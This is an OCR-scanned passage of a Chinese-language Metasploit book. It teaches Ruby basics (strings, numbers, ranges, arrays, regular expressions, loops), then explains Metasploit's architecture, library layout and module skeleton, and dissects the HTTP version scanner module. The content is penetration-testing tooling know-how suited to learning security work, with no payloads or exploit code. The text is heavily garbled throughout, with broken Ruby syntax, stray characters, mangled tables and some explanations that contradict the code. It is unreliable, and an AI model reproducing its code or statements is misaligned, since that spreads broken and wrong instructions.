变量 连接 起 来 ， 得 到 了 一 个 完整 的 输出 "Nipun loves Metasploit and plays counter strike", 
e 子 字 符 串 (substring) 函数 


在 Rupy 中 可 以 轻松 地 使 用 substring 函数 来 获取 子 字符 串 一 一 只 需要 指明 子 字符 串 在 字符 中 
的 起 始 位 置 和 长 度 ， 就 可 以 获得 它 ， 如 下 所 示 : 

irb(main):001:0» a- "12345678" 

=> "12345678" 


irb(main):002:0> a[0,2] 
=> na]: 






































pm 
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irb(main):003:0» a[2,2] 
=> "34" 


€ split 函数 




















PH 


irb(main):001:0» a = "mastering,metasploit" 
-» "mastering,metasploit" 

irb(main):002:0» b = a.split(",") 

-» ["mastering", "metasploit"] 
irb(main):003:0» b[0] 

-» "mastering" 

irb(main):004:0» b[1] 

=> "metasploit" 


可 以 看 到 ， 现 在 已 经 将 字符 串 转 换 成 了 一 个 新 的 数组 b。 这 个 数组 b 中 包含 


JTA, 分别 是 "mastering" 和 "metasploit"。 
2. Ruby 中 的 数字 和 转换 


我 们 可 以 直接 在 算术 运算 中 使 用 数字 。 在 处 理 用 户 的 输入 时 ,可 以 用 co i 
输入 转换 成 整数 。 男 一 方面 ， 也 可 以 使 用 co s 函数 将 一 个 整数 转换 成 字符 串 


来 看 一 个 简单 的 例子 以 及 它 的 输出 : 


irb(main):006:0» b="55" 
2x55" 
irb(main):007:0» b+10 
TypeError: no implicit conversion of Fixnum into String 
from (irb):7:in `+' 
from (irb):7 
from C:/Ruby200/bin/irb:12:in ^«main»' 
irb(main):008:0» b.to i410 



































了 


o 


-» 65 

irb(main):009:0» a-10 

-» 10 

irb(main):010:0» b-"hello" 
-» "hello" 


irb(main):011:0» a+b 
TypeError: String can't be coerced into Fixnum 
from (irb):11:in `+' 
from (irb):11 
from C:/Ruby200/bin/irb:12:in ^«main»' 
irb(main):012:0» a.to s-«b 
=> "1Ohello" 





可 以 使 用 split 函数 将 一 个 字符 串 类 型 的 值 分 割 为 一 个 变量 数组 。 用 一 个 简单 的 例子 来 说 明 这 E 





b[0] 和 pb[1] 两 个 





函数 将 字符 串 类 型 的 











可 以 看 到 ， 当 将 一 个 用 引号 标记 的 值 赋 给 变量 bp 时 ， 这 个 变量 会 被 当 作 一 个 字符 串 处 理 。 当 使 用 


























这 个 变量 进行 加 法 运算 时 就 会 出 现 错误 。 但 是 ， 对 其 使 用 了 co i 函数 以 后 ， 这 
类 型 转换 成 整 型 ， 从 而 可 以 正常 地 执行 加 法 运算 。 同 样 ， 对 于 字符 串 ， 当 我 们 试 
字符 串 连接 到 一 起 时 ， 错 误 就 出 现 了 。 不 过 ， 当 进行 了 类 型 转换 后 ， 一 切 就 正常 




















个 变量 就 会 从 字符 串 
图 将 一 个 整数 和 一 个 
了 了 o 
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e Ruby 中 的 数 制 转换 
在 使 用 渗透 模块 和 其 他 模块 时 , 都 将 使 用 到 各 种 转换 机 制 。 现 在 来 看 一 些 之 后 会 用 到 的 数 制 转换 。 
口 16 进 制 到 10 进 制 的 转换 












































m 在 Ruby 中 使 用 hex 函数 对 一 个 数值 进行 从 16 进 制 到 10 进 制 的 转换 是 十 分 简单 的 ， 下 面 给 


出 了 一 个 示例 : 
irb(main):021: 
二 > "10" 
irb(main):022: 
z> 16 


0» a- "10" 


0> a.hex 


m 可 以 看 出 ，16 进 制 下 的 10 对 应 10 进 制 下 的 16; 
口 10 进 制 到 16 进 制 的 转换 
m 和 上 例 中 相反 的 操作 可 以 使 用 to_s 函数 来 实现 : 


irb(main):028:0» 16.to s(16) 




















=> "10" 


3. Ruby 中 的 范围 











范围 (range) 是 一 个 很 重要 的 内 容 , 广泛 应 用 在 Metasploit 的 辅助 模块 中 ， 例 如 扫描 模块 和 测试 


模块 。 


让 我 们 定义 一 个 范围 ， 并 





F 











irb (main) :028:0> zero_ 


SEU S] 


irb(main):031:0» zero. 


-» true 


irb(main):032:0» zero to nine. 


=> false 


irb(main):002:0» zero to nine. 


01234567892» 0..9 


irb(main):003:0» zero to nine. 


=> 


=> 





0 
irb(main):004:0» zero to nine. 
9 








我 们 可 以 看 到 一 个 范 














的 所 有 数据 。 这 里 的 inci 


to nine. 


PAREREA, MURR, de Xs MEURISCK IR, DU STGB 





日 查看 一 下 可 以 对 这 种 数据 类 型 进行 哪些 操作 : 


to nine- 0..9 


include? (4) 

include? (11) 

eachílzero to ninel| print (zero to nine)) 
min 


max 




















zu 

















Lude? RKA EU v E] p det B E T EXE RUE, HEAR, min 和 max 








X 


数 可 以 显示 出 范围 中 的 最 小 值 和 最 大 值 。 


4. Ruby 中 的 数组 


我 们 可 以 简单 地 将 数组 定义 为 一 系列 元 素 的 集合 。 来 看 一 个 例子 : 


irb(main):005:0» name = 


=> ["nipun", "metasploit"] 
irb(main):006:0» name[0] 


["nipun","metasploit"] 
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=> "nipun" 

irb (main) :007:0> name[1] 

=> "metasploit" 

到 现在 为 止 , 已 经 介绍 了 所 有 编写 Metasploit 模块 必需 的 变量 和 数据 类 型 的 相关 知识 。 
有 关 变 量 和 数据 类 型 的 更 多 信息 ， 请 访问 http//www.tutorialspoint.com/ruby/ o E] 
有 关 使 用 Ruby 编程 的 速 查 表 , 请 参考 https://github.com/savini/cheatsheets/raw/master/ 

人 ruby/RubyCheat.pdf。 

如 果 你 现在 正 从 别 的 语言 向 Ruby 语言 过 渡 , 这 有 一 份 推荐 材料 : http://hyperpolyglot. 


org/scripting。 











2.1.8 Ruby 中 的 方法 


方法 是 函数 的 另 一 个 说 法 。 除 了 Ruby 程序 员 以 外 , 其 他 背景 的 程序 员 可 能 经 常 使 用 这 两 种 叫 法 。 
方法 就 是 指 能 执行 特定 操作 的 子 程序 。 方 法 的 使 用 实现 了 代码 的 重用 ,大 大 缩短 了 程序 的 长 度 。 定 义 
一 个 方法 很 容易 ， 在 定义 开始 的 地 方 使 用 aet 关键 字 ， 在 结束 的 地 方 使 用 ena 关键 字 。 让 我 们 通过 
一 个 简单 的 程序 来 了 解 它们 的 工作 方式 ， 例 如 打印 出 50 个 空格 。 


def print_data (par1) 
Square = parl*par1 
return square 

end 

answer - print data(50) 
print (answer) 


这 里 的 print, daca 方法 接收 主 两 数 发 送 过 来 的 参数 ,然后 让 其 乘 以 自身 , 再 使 用 return 将 结 
果 返 回 。 这 个 程序 将 返回 的 值 放 到 了 一 个 名 为 answer 的 变量 中 ， 随 后 输出 了 这 个 值 。 我 们 将 在 本 章 
的 后 面 和 接 下 来 的 几 章 中 频繁 地 使 用 Ruby 中 的 方法 。 
2.4.4 决策 运算 符 

与 其 他 任何 编程 语言 一 样 ， 决 策 在 Ruby 中 也 是 一 个 简单 的 概念 。 看 一 个 例子 : 


irb(main):001:0» 1» 2 
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=> false 
同样 ， 再 来 查看 一 个 字符 串 数据 的 例子 : 
irb(main):005:0> "Nipun" == "nipun" 
=> false 
irb(main):006:0> "Nipun" == "Nipun" 
=> true 








来 看 一 个 使 用 决策 运算 符 的 简单 程序 : 
def find match(a) 


if a =~ /Metasploit/ 
return true 
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else 

return false 
end 

end 

E HAMA EFA 


a = "1238924983Metasploitduidisdid" 


bool b-find match(a) 
print bool b.to s 





在 上 面 的 这 个 程序 中 ， 我 们 使 用 了 一 个 包含 有 "Metasploit" 的 字符 串 ， 这 个 字符 串 中 的 
"Metasploit" 前 后 都 添加 了 一 些 无 用 字符 。 然 后 将 这 个 字符 串 赋 值 给 变量 a。 接 下 来 ， 将 该 变量 传 





























递 给 函数 fina_matcnh() ， 这 个 函数 的 作 




















是 检查 该 变量 是 否 可 以 匹配 正则 表达 式 /Metasploit/。 


如 果 这 个 变量 中 包含 了 "Metasploit "的话 ， 抑 数 的 返回 值 就 是 true， 和 否则 就 会 将 false 赋值 给 


bool b 变量 。 


























运行 上 面 这 个 方法 将 会 产生 一 个 true, 这 是 因为 按照 决策 运算 符 =~ 的 计算 , 这 两 个 值 是 匹配 的 。 





前 面 的 程序 在 Windows 系统 环境 中 执 











C:NRuby23-x64Nbin»ruby.exe a.rb 
true 


2.1.5 Ruby 中 的 循环 








行 完成 后 ， 输 出 的 结果 如 下 所 示 。 

















迭代 语句 被 称 为 循环 。 正 如 任何 其 他 编程 语言 一 样 ，Ruby 编程 中 也 包含 循环 结构 。 接 下 来 让 我 











们 来 使 用 一 下 这 种 结构 ， 看 看 它 的 语法 和 











其 他 编程 语言 的 不 同 之 处 。 





def forl(a) 

for i in 0..a 

print ("Number #{i}n") 
end 

end 

forl (10) 

















上 面 的 代码 按照 定义 的 范围 从 0 遍历 到 10, 实现 了 循环 打印 输出 当前 的 值 。 在 这 里 我 们 使 用 # Gi) 








去 打印 输出 变量 i 的 值 。 关 键 字 n 指定 开始 新 的 一 行 。 因 此 , 每 一 次 打印 输出 变量 时 ,都 会 自动 占用 


新 的 一 行 。 








面 是 一 个 示例 : 








def each example (a) 
a.each do lil 

print i.to s + "t" 
end 

end 

E HAMARE FA 

a = Array.new(5) 
a-[10,20,30,40,50] 
each, example (a) 
































迭代 循环 是 通过 each 实现 的 。 这 是 一 种 十 分 常见 的 做 法 ， 在 Metasploit 模块 中 被 广泛 使 用 。 下 
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在 上 面 的 代码 中 ,我 们 定义 了 一 个 方法 ， 这 个 方法 接收 一 个 数组 a， 然 后 将 数组 a 中 的 所 有 元 素 
用 each 循环 打印 出 来 。 使 用 each 方法 完成 循环 会 将 数组 a 中 的 元 素 临 时 保存 到 i 中 ， 一 直到 下 一 
个 循环 时 再 重 写 这 个 变量 的 值 。 输 出 语句 中 的 .t 表示 一 个 制 表 位 (tab )。 
































2.1.6 ”正则 表达 式 


正则 表达 式 用 来 匹配 一 个 字符 串 或 者 获取 字符 串 在 一 组 给 定 的 字符 串 或 一 个 句子 中 出 现 的 次 数 。 
在 Metasploit 中 ， 正 则 表达 式 十 分 关键 。 在 编写 漏洞 检查 工具 和 扫描 工具 以 及 分 析 某 个 给 定 端口 的 响 
应 时 ， 总 会 需要 使 用 正则 表达 式 。 


让 我 们 看 一 个 例子 ， 这 里 的 程序 演示 了 正则 表达 式 的 使 用 。 


设想 这 样 一 个 场景 : 我 们 有 一 个 变量 n, 它 的 值 是 nello worla, 我 们 需要 为 它 设 计 一 个 正则 表 
达 式 。 来 看 看 下 面 的 代码 : 


irb(main):001:0» n = "Hello world" 
-» "Hello world" 

irb(main):004:0» r - /world/ 

-» /world/ 

irb(main):005:0» r.match n 

=> f$«MatchData "world"> 
irb(main):006:0» n =~ r 

=> 


我 们 创建 另 一 个 名 为 r 的 变量 ， 并 把 正则 表达 式 内 容 一 一 /world/ 保 存在 其 中 。 在 下 一 行 ,我 们 
用 MatchData 类 的 match 对 象 将 这 个 字符 串 和 正则 表达 式 进 行 匹配 。 命 令 行 返回 了 一 个 匹配 成 功 的 
信息 MatchData "world"。 接 下 来 使 用 另 一 个 运算 符 =-~ 来 完成 字符 串 的 匹配 操作 ， 返 回 匹配 的 具体 
位 置 。 让 我 们 看 一 个 这 样 的 例子 : 

irb(main):007:0» r = /^world/ 

=> /^world/ 

irb(main):008:0» n =~ r 

z> mil 

irb(main):009:0> r = /^Hello/ 

=> /^Hello/ 

irb(main):010:0> n =~ r 

Saü 

irb(main):014:0» r= /world$/ 

=> /world$/ 

irb(main):015:0» n=~ r 

245 


分 配 一 个 新 的 值 /^worla/ 给 =， 这 里 ^ 运 算 符 表示 要 匹配 字符 串 的 开始 位 置 。 我 们 得 到 了 输出 
nil， 这 说 明 并 没有 匹配 成 功 。 我 们 修改 这 个 表达 式 以 匹配 单词 Hello 开始 的 字符 串 。 这 一 次 ， 系 统 
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的 输出 为 数字 0， 这 意味 着 在 最 开始 的 位 置 匹 配 成 功 。 下 一 步 ， 将 正则 表达 式 修改 为 /worlds/， 这 
意味 着 只 有 一 个 以 单词 worla 结尾 的 字符 串 才 会 匹配 。 





e 








ZH X Ruby 中 正则 表达 式 的 更 多 信息 , 请 访问 http/www.tutorialspoint.com/Ruby/Ruby _ 
regular expressions.htm 。 

下 方 的 链接 提供 了 Ruby 编程 语言 速 查 卡 , 可 以 让 你 的 编程 更 高 效 : https://github.com/ 
savini/cheatsheets/raw/master/Ruby/RubyCheat.pdf; http://hyperpolyglot.org/scripting。 
有 关 如 何 构建 正确 的 正则 表达 式 的 更 多 信息 ， 请 访问 http://rubular.com/。 


2.1.7 Ruby 基础 知识 小 结 











怎么 样 ， 是 不 是 已 经 有 些 困倦 了 ? 这 节 有 些 沉 癌 吧 ? 我 们 刚刚 讨论 了 Ruby 的 基本 功能 ， 这 些 功 








能 都 是 设计 实现 Metasploit 模块 所 必需 的 。Ruby 语言 涵盖 的 内 容 十 分 丰富 ,这 里 不 可 能 把 各 个 方面 都 
介绍 到 。 但 是 ， 你 可 以 从 下 面 的 网 址 获得 极为 优秀 的 Ruby 编程 资源 。 
































口 一 个 丰富 的 Ruby 语言 教程 资源 库 : http://tutorialspoint.com/Ruby/。 
口 可 以 帮助 你 提高 Ruby 语言 编程 效率 的 速 查 表 的 链接 : 

















m https://github.com/savini/cheatsheets/raw/master/Ruby/RubyCheat.pdf 


m http:;//hyperpolyglot.org/scripting 











Q 有 关 Ruby 的 更 多 信息 ， 请 访问 http//en.wikibooks.org/wiki/Ruby Programming. 
2.0 开发 自 定 义 模块 
让 我 们 接着 深入 地 学 习 模 块 编写 过 程 。Metasploit 拥有 大 量 的 攻击 载荷 模块 、 编 码 器 模块 、 渗 透 


模块 、 空 





























§ 令 模块 、 辅 助 模块 。 这 一 节 将 学 习 模 块 开 发 的 要 点 。 我 们 来 了 解 一 下 如 何在 实际 中 创建 自 
己 的 自 定义 模块 。 





本 节 将 就 辅助 模块 和 后 渗透 模块 的 开发 展开 讨论 。 渗 透 模块 会 在 下 一 章 中 详细 讨论 。 我 们 首先 来 





看 看 开发 一 个 模块 的 要 领 。 





2.2.1 ”模块 编写 的 概要 
在 构建 模块 之 前 ， 我 们 先 来 了 解 Metasploit 的 体系 框架 ， 以 及 Metasploit 所 有 组 成 部 分 和 它们 各 


自 的 功能 。 


1. Metasploit 框架 的 体系 结构 


Metasploit 是 由 很 多 组 件 构 成 的 ， 比 如 基础 库 文件 、 模 块 、 插 件 以 及 工具 。Metasploit 的 体系 框 : 








TERT 
p 




















结构 示意 图 如 下 。 
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UML 表 示 法 








数据 存储 ， 事 体 调 度 


会 话 管理 
MSF::Core 


MSF::Base 
配置 日 志 


ole nsfcli 
& | en 


webUI 








序列 化 ige 


nsfgui 
A Dra 


渗透 模块 







辅助 模块 
AZ 
编码 模块 
渗透 模块 
控 指 令 模块 
(NOP) 





攻击 载荷 








Armitage 




















来 看 看 这 些 组 件 分 别 是 什么 以 及 它们 的 功能 是 什么 。 最 好 的 切 人 点 就 是 Metasploit 的 核心 部 分 一 一 
电 基础 库 文件 。 可 以 通过 下 表 中 的 说 明 来 了 解 各 种 基础 库 文件 的 用 途 。 
基础 库 文件 名 称 用 B 
Ruby 扩 展 (REX) ”处 理 几 平 所 有 的 核心 功能 ， 如 设置 网 络 套 接 字 、 网 络 的 连接 、 格 式 化 和 所 有 其 他 基本 功能 
MSF 核心 提供 了 基本 的 应 用 编程 接口 和 框架 的 实际 核心 
MSF 基础 为 模块 提供 了 友好 的 应 用 编程 接口 


Metasploit 中 包含 多 种 不 同 的 模块 类 型 ， 它 们 各 自 有 着 不 同 的 功能 。 攻 击 载荷 模块 用 来 创建 一 
个 本 机 与 被 渗透 的 主机 之 间 的 通道 。 辅 助 模块 用 来 实现 各 种 辅助 操作 ， 例 如 信息 收集 、 目 标 踩 点 、 
对 应 用 程序 进行 fuzz 测试 以 及 各 种 服务 的 登录 。 来 看 看 这 些 模块 的 基本 功能 ， 如 下 表 所 示 。 












































模块 类 型 X 能 

攻击 载 集 模块 这 类 模块 通常 用 来 在 成 功 渗透 目标 以 后 建立 从 本 机 发 起 到 目标 、 从 目标 发 起 到 本 机 的 连接 , 或 
者 执行 特定 的 任务 ， 例 如 在 目标 机 上 安装 一 个 服务 ， 等 等 。 攻 击 载荷 模块 是 在 成 功 渗透 了 目标 
计算 机 以 后 的 下 一 个 步骤 。 前 一 章 中 广泛 使 用 的 Meterpreter 就 是 一 个 常见 的 Metasploit 攻 击 载荷 
模块 

辅助 模块 辅助 模块 是 一 种 用 来 执行 指定 任务 的 特殊 模块 ,例如 信息 收集 、 数 据 库 特 征 识别 、 端 口 扫描 和 
banner 获 取 

编码 器 模块 这 些 模块 用 来 对 攻击 向 量 和 攻击 载荷 进行 加 密 ， 借 此 躲避 杀毒 软件 和 防火 墙 的 检测 

NOP 实现 指令 的 对 齐 ， 提 高 渗透 程序 的 稳定 性 

渗透 模块 触发 一 个 系统 漏洞 的 实际 代码 
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2. 了 解 文件 结构 
Metasploit 中 的 文件 结构 如 下 图 所 示 。 





documentati lib modules 
on 


o 
o 
2 
5 
HN ua 
HN : | 
tu 
E 
tu 
E 
P 
dk 
a 
4 


E 
go * 
< A 


plugins scripts tools vendor msfdb msfupdate 
z= z= ES z= E Ex gU 
Gemfile Gemfile. metasploit- msfconsole msfd msfrpc msfrpcd 
lock framework. 
gemspec 
msfvenom Rakefile 











现在 先 来 了 解 Metasploit 中 一 些 相关 的 目录 ， 这 将 有 助 于 我 们 更 好 地 建立 Metasploit 模块 ， 这 些 
目录 如 下 表 所 示 。 























EH sx 用 B 

lib Metasploit 的 核心 和 灵魂 ， 包 含 了 帮助 我 们 建立 MSF 模块 的 全 部 重要 库 文件 

modules 包含 Metasploit 中 的 所 有 P 模块 到 后 渗透 模块 ， 每 一 个 Metasploit 中 集成 的 模块 都 可 以 在 
这 个 目录 中 找到 

tools 包含 了 用 于 辅助 渗透 测试 的 命令 行程 序 。 从 创造 无 用 数据 到 查找 JMP ESP 地 址 的 工具 都 可 以 在 这 里 找 











到 ， 所 有 有 用 的 命令 行程 序 都 包含 于 此 








plugins 包含 了 所 有 用 于 扩展 Metasploit 功 能 的 插件 ， 例 如 OpenVAS、Nexpose、Nessus 以 及 其 他 各 种 可 以 使 用 
load 命 令 载 和 的 工具 
scripts 包含 了 Meterpreter 和 其 他 各 种 脚本 

















3. 了 解 库 的 布局 


Metasploit 的 模块 是 由 各 种 各 样 的 函数 构成 的 。 这 些 函 数 包括 各 种 基础 库 文件 以 及 使 用 Ruby 编写 
的 通用 程序 。 在 使 用 这 些 函 数 之 前 ， 首 先 要 知道 这 些 函 数 是 什么 ， 如 何 使 用 这 些 函 数 ， 调 用 函数 时 需 
要 传递 多 少 个 参数 ， 这 些 函 数 的 返回 值 会 是 什么 。 


来 看 看 这 些 库 的 实际 位 置 ， 如 下 面 的 屏幕 截图 所 示 。 
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zu B MN 
anemone metasm metasploit msf 
rbmysql rex snmp sqlmap 
enumerabl X msfenv.b postgres- . rbmysqLrb 
e.rb msf.rb 
telephony. windows- 
rb console. 
color. 
support.rb 


net postgres rabal 
tasks telephony — anemone.rb 
le D le 
rex.rb robots.rb snmp.rb 











正如 上 图 所 示 , 对 于 我 们 很 重要 的 rex 库 文件 位 于 /lib 目录 下 。 在 /lib 下 还 包含 了 各 种 服务 的 重要 
目录 。 


另外 两 个 重要 的 库 /base 和 /core 位 于 /msf 目录 下 ， 如 下 图 所 示 。 














base COre Scripts Ui util base.rb 
D n e| D n .| 
core.rb events.rb sanity.rb ui.rb util.rb windows.- 
error.rb 





在 /msf/core 库 文 件 夹 中 ， 可 以 看 到 第 1 章 涉及 的 所 有 模块 的 库 文 件 ， 如 下 1 











的 屏幕 截图 所 示 。 





I 
7 











auxiliary 

db manager 
encoder 

encoding 

exe 

exploit 

handler 

module 
module_manager 
modules 

payload 

post 

rpc 

session 
author . rb 
auxiliary. rb 
constants. rb 
database_event. rb 
data_store. rb 
db_export.rb 
db_import_error.rb 
db_manager.rb 
lencoded_payload.rb 





root@kali: /usr/share/metasploit-framework/lib/msf/coref£ ls -X 


encoder.rb 

event dispatcher.rb 
exceptions.rb 
exploit driver.rb 
exploit.rb 
framework.rb 
handler.rb 

host state.rb 
module manager.rb 
module.rb 

module set.rb 
modules . rb 

nop. rb 
opt_address_local. rb 
opt_address_range. rb 
opt address.rb 

opt base.rb 

opt bool.rb 

opt enum.rb 

opt float.rb 

opt int.rb 

option container.rb 
opt path.rb 


root@kali: /usr/share/metasploit-framework/lib/msf/coreff || 


opt port.rb 

opt raw.rb 

opt.rb 

opt regexp.rb 

opt string.rb 
payload generator.rb 
payload.rb 

payload set.rb 
platform.rb 

plugin manager.rb 
plugin.rb 

post mixin.rb 
post.rb 
reference.rb 
reflective dll loader.rb 
rpc.rb 

service state.rb 
session manager.rb 
session.rb 

site reference.rb 
target.rb 

thread manager.rb 





58 第 2 章 打造 定制 化 的 Metasploit 渗透 测试 框架 





这 些 库 文件 提供 核心 的 辅助 模块 。 然 而 对 于 不 同 的 操作 和 功能 ， 可 以 使 用 任何 需要 的 库 文件 。 一 
些 Metasploit 模块 广泛 使 用 的 库 文件 均 位 于 core/exploits/ 目 录 下 ， 如 下 面 的 屏幕 截图 所 示 。 














rootgkali: /usr/share/metasploit-framework/lib/msf/core/exploitf£ ls -X 
cmdstager dcerpc lsa.rb local.rb sip.rb 
format dcerpc mgmt.rb ^ mixins.rb 

http dcerpc.rb mssql commands.rb  smtp.rb 

java dect coa.rb mssql.rb snmp.rb 
kerberos dhcp.rb mssql sqli.rb ssh.rb 

local dialup.rb mysql.rb sunrpc.rb 
powershell egghunter. rb ndmp. rb tcp.rb 

remote exe.rb ndmp socket.rb tcp server.rb 
smb file dropper.rb ntlm.rb telnet.rb 
afp.rb fileformat.rb omelet.rb tftp.rb 
android.rb fmtstr.rb oracle.rb tincd.rb 
arkeia.rb fortinet.rb pdf parse.rb tns.rb 

auto target.rb ftp.rb pdf.rb udp.rb 
browser autopwn2.rb ftpserver.rb php. exe. rb vim soap.rb 
browser autopwn.rb gdb. rb pop2.rb wbemexec. rb 
brute.rb imap.rb postgres.rb wdbrpc client.rb 
brutetargets.rb ip.rb powershell.rb wdbrpc.rb 
capture.rb ipv6.rb realport.rb web.rb 
cmdstager.rb java.rb riff.rb windows constants.rb 
db2.rb jsobfu.rb ropdb. rb winrm.rb 
dcerpc epm.rb kernel mode.rb — seh.rb 














还 可 以 在 core/ 目 录 下 找到 支持 各 种 类 型 模块 的 所 有 相关 库 文 件 。 目 前 ， 这 里 可 以 找到 渗透 模块 、 
攻击 载荷 模块 、 后 渗透 模块 、 编 码 器 模块 以 及 各 种 其 他 模块 的 核心 库 文件 。 











Æ https://github.com/rapid7/Metasploit-framework 上 可 以 访问 Metasploit 的 Git 存 储 库 ， 
获得 完整 的 源 代 码 。 
2.2.2 ”了解 现 有 模块 
开发 自 定义 模块 最 好 的 办 法 就 是 先 深 入 理解 Metasploit 现 有 模块 的 内 部 机 制 ， 看 看 它们 是 如 何 工 
作 的 。 


Metasploit 模块 的 格式 
Metasploit 模块 的 骨骼 框架 比较 简单 ， 下 面 的 代码 就 给 出 了 一 个 通用 的 框架 头 部 : 


require 'msf/core' 






































class MetasploitModule « Msf::Auxiliary 


def initialize(info - () 
super(update info(info, 
'Name' -» 'Module name', 
'Description' => %q{ 
Say something that the user might want to know. 

Er 
'Author' => [ 'Name' ], 
'License' => MSF LICENSE 


) 


end 
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def run 
# 主 函 数 
end 
end 


模块 一 般 都 会 从 使 用 require 关键 字 导 入 重 要 的 库 文件 开始 ， 上 面 的 代码 就 导 信 了 msf/core 
库 。 所 以 ， 这 个 模块 中 就 包含 了 msf 目录 下 的 core 库 文件 。 

接 下 来 的 主要 任务 是 定义 这 个 类 的 类 型 ， 以 指定 我 们 要 创建 的 模块 种 类 。 我 们 在 这 个 示例 中 定义 
了 类 的 用 途 为 MSF: :Auxiliaryv。 

initialize 方法 是 Ruby 编程 语言 中 的 默认 构造 方法 。 在 这 个 方法 中 , 我 们 定义 了 名 称 ( Name )、 
描述 (Description). fE3f (Author), 许可 (Licensing ) 和 cvE 信息 等 。 这 个 方法 涵盖 了 特定 
模块 的 所 有 相关 信息 : 软件 的 名 称 通常 会 体现 设计 软件 的 目的 ; 描述 中 会 包含 对 漏洞 的 摘要 说 明 ; 作 
者 是 开发 这 个 模块 的 人 的 名 字 ; 许可 就 是 MSF_LICENSE， 就 像 前 面 的 示例 代码 一 样 。 辅 助 模块 中 的 
CERRO run 方法 。 因此 , 除非 你 要 使 用 特别 多 的 方法 , 否则 所 有 的 操作 都 应 该 在 这 个 函数 里 面 执行 。 
但 是 程序 仍然 要 从 run 方法 开始 执行 。 


2.2.3 分解 已 有 的 HTTP 服务 器 扫描 模块 


我 们 以 一 个 简单 的 HTTP 版 本 的 扫描 模块 开始 ， 看 看 它 是 如 何 工 作 的 。 这 个 Metasploit 模块 位 于 
/modules/auxiliary/scanner/http/http_version.rb。 先 系统 地 来 看 看 这 个 模块 : 


dd 

# 这 个 模块 需要 Metasploit: https://metasploit.com/download 
# 当前 来 源 : https://github.com/rapid7/metasploit-framework 
## 

require 'rex/proto/http' 

class MetasploitModule < Msf::Auxiliary 


接 下 来 讨论 一 下 这 里 的 内 容 是 如 何 安排 的 。 一 般 来 说 ， 所 有 的 Metasploit 模块 都 以 注释 开始 ， 而 
这 些 注释 都 是 一 些 以 # 标 识 作为 开头 的 行 。 语 句 require 'rex/proto/http' 声 明了 该 程序 将 要 引 
人 这 个 rex 库 文 件 目 录 下 的 所 有 HTTP 协议 方法 。 因 此 ， 所 有 如 下 图 所 示 的 /lib/rex/proto/http 目录 下 
的 文件 现在 都 可 以 被 该 模块 使 用 了 。 
=- 一 mm- 一 
B E 0O O D D 


handler packet client.rb client_ handler.rb packet.rb 


request.rb 


requestrb  response.rb — server.rb 



























































































































































这 些 文件 包含 了 各 种 各 样 的 HTTP 方法 ,包括 用 于 设置 连接 的 函数 ，GET 和 PosT 的 请 求 ， 响 应 
处 理 等 。 
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接 下 来 的 Msf: :Auxiliary 定义 了 这 段 代 码 的 类 型 是 辅助 模块 。 接 下 来 继续 查看 这 段 代 码 。 


# 首先 调用 渗透 mixin X 

include Msf::Exploit::Remote::HttpClient 
include Msf::Auxiliary::WmapScanServer 

# 接着 是 扫描 器 模块 mixin X 

include Msf::Auxiliary::Scanner 


DER E 了 所 有 必需 的 库 文件 ， 在 这 些 库 文件 中 涵盖 了 我 们 编写 模块 所 需要 的 所 有 方 
法 。 下 表 给 出 了 这 些 库 文 件 的 详细 信息 。 
































E: f] 路 径 用 途 
Msf::Exploit::Remote::HttpClient /lib/msf/core/exploit/http/client.rb 这 个 库 文件 提供 了 大 量 方法 ， 例 如 
连接 到 目标 计算 机 、 发 送 请 求 、 切 
断 与 客户 端的 连接 等 
Msf::Auxiliary::WmapScanServer /lib/msf/core/auxiliary/wmapmodule.rb bra 什么 是 WMAP? WMAP 





一 款 基 于 Metasploit 的 通用 Web 应 
用 程序 扫描 框架 ， 有 助 于 完成 
Metasploit 的 Web 涂 透 测 试 


Msf::Auxiliary::Scanner /lib/msf/core/auxiliary/scanner.rb 这 个 文件 包含 了 基于 扫描 模块 的 所 
有 函数 ， 提 供 了 模块 运行 、 模 块 初 
始 化 、 扫 描 进度 等 各 种 方法 


接着 来 看 下 一 段 代码 。 


def initialize 











super( 
'Name' -» 'HTTP Version Detection', 
'Description' -» 'Display version information about each system', 
'Author' -» 'hdm', 
'License' => MSF LICENSE 


) 


register wmap options(( 
'OrderID' => 0, 
'Require' => {}, 
j 


end 


模块 的 这 部 分 定义 了 initialize 方法 。 这 个 方法 初始 化 了 该 Metasploit 模块 的 基本 参数 ， 例 如 
名 称 、 作 者 、 描 述 、 对 于 不 同 Metasploit 模块 的 许可 和 WMAP 模块 的 默认 参数 。 看 看 代码 的 最 后 一 
部 分 。 


# 对 单 台 主机 进行 踩点 
def run, host(ip) 





begin 
connect 
res = send request raw(( 'uri' -» '/', 'method' -» 'GET' }) 


fp = http fingerprint(:response => res) 

print good("4(ip):S4(rport) #{fp}") if fp 

report service(:host -» rhost, :port -» rport, :sname -» (ssl ? 
"hktps' : 'http'), :info s» fp) 
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rescue ::Timeout::Error, ::Errno::EPIPE 
ensure 
disconnect 
end 
end 
end 
前 面 的 函数 是 扫描 功能 的 具体 实现 。 
库 和 函数 
下 表 给 出 了 在 本 模块 中 所 使 用 的 重要 函数 。 
BR 数 E x 件 用 途 
run host /lib/msf/core/auxiliary/scanner.rb 对 每 台 主 机 运行 一 次 的 主 方法 
connect /lib/msf/core/auxiliary/scanner.rb 用 来 和 目标 主机 建立 连接 
send raw request /core/exploit/http/client.rb 用 来 向 目标 发 送 原始 的 HTTP 请 求 
request_raw /rex/proto/http/client.rb send raw, request 会 将 数据 传递 给 
request raw 
http fingerprint /lib/msf/core/exploit/http/client.rb 将 HTTP 响应 解析 为 可 以 使 用 的 变量 
report, service /lib/msf/core/auxiliary/report.rb 用 来 向 数据 库 报 告 并 存储 在 目标 主机 
上 发 现 的 服务 








来 试 着 理解 模块 。 这 里 有 一 个 名 为 run host 的 方法 ， 该 方法 使 用 IP 作为 建立 与 所 需 主机 的 连 
接 的 参数 。 方 法 run host 是 从 /lib/msf/core/auxiliary/scanner.rb 库 文 件 中 引入 的 。 这 个 方法 将 为 每 台 
主机 运行 一 次 ， 如 下 图 所 示 。 

















( .respond to?('run range')) 
# No automated progress reporting or error handling for run range 
run range (datastore['RHOSTS']) 


( .respond to?('run host')) 
loop 
# Stop scanning if we hit a fatal error 


has fatal errors? 


# Spawn threads for each host 
(Gtl.length « threads max) 


# Stop scanning if we hit a fatal error 
has fatal errors? 


ip = ar.next ip 


ip 
@tl << framework.threads.spawn('"ScannerHost( )- LE , ip.dup) | tibl 
targ — tip 
nmod = .replicant 





nmod.datastore['RHOST'] = targ 








接 下 来 ， 我 们 看 到 了 begin 关键 字 ， 这 意味 着 代码 块 的 开始 。 在 接 下 来 的 语句 中 ， 可 以 看 到 
